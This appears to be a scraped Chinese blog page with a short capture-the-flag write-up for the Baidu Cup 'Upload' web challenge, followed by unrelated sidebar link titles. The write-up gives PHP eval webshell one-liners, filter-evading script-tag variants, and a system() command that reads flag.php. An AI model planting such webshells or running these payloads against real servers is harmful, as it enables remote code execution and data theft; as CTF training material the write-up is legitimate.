当前位置:网站首页>“百度杯”CTF比赛 九月场,Web:Upload
“百度杯”CTF比赛 九月场,Web:Upload
2022-07-05 13:00:00 【Part 02】
题目内容:
想怎么传就怎么传,就是这么任性。
tips:flag在flag.php中
<?php @eval($_POST['Pai']);?>

<script language="pphphp">@eval($_POST['Pai']);</script>

<script language="PHP">@eval($_POST['Pai']);</script>
此时页面和源码都看不到代码了,直接 post
Pai=phpinfo();

正常命令执行获取 flag
system('tac ../flag.php');
边栏推荐
- Introduction aux contrôles de la page dynamique SAP ui5
- 手把手带你入门Apache伪静态的配置
- 前缀、中缀、后缀表达式「建议收藏」
- Shu tianmeng map × Weiyan technology - Dream map database circle of friends + 1
- Lb10s-asemi rectifier bridge lb10s
- [cloud native] event publishing and subscription in Nacos -- observer mode
- 国际自动机工程师学会(SAE International)战略投资几何伙伴
- SAP SEGW 事物码里的 Association 建模方式
- 山东大学暑期实训一20220620
- SAP UI5 FlexibleColumnLayout 控件介绍
猜你喜欢

Write macro with word

What is the difference between Bi software in the domestic market

Principle and configuration of RSTP protocol

Solve Unicode decodeerror: 'GBK' codec can't decode byte 0xa2 in position 107

SAP UI5 ObjectPageLayout 控件使用方法分享

Talk about my drawing skills in my writing career

Introduction to the principle of DNS

The Research Report "2022 RPA supplier strength matrix analysis of China's banking industry" was officially launched

LB10S-ASEMI整流桥LB10S

Changing JS code has no effect
随机推荐
JXL notes
Navigation property and entityset usage in SAP segw transaction code
My colleague didn't understand selenium for half a month, so I figured it out for him in half an hour! Easily showed a wave of operations of climbing Taobao [easy to understand]
Insmod prompt invalid module format
Shu tianmeng map × Weiyan technology - Dream map database circle of friends + 1
实现 1~number 之间,所有数字的加和
前缀、中缀、后缀表达式「建议收藏」
将函数放在模块中
Hiengine: comparable to the local cloud native memory database engine
事务的基本特性和隔离级别
Introduction to the principle of DNS
函数传递参数小案例
SAP UI5 DynamicPage 控件介紹
STM32 and motor development (from architecture diagram to documentation)
解决uni-app配置页面、tabBar无效问题
leetcode:221. Maximum square [essence of DP state transition]
Although the volume and price fall, why are the structural deposits of commercial banks favored by listed companies?
关于 SAP UI5 getSAPLogonLanguage is not a function 的错误消息以及 API 版本的讨论
LB10S-ASEMI整流桥LB10S
Lb10s-asemi rectifier bridge lb10s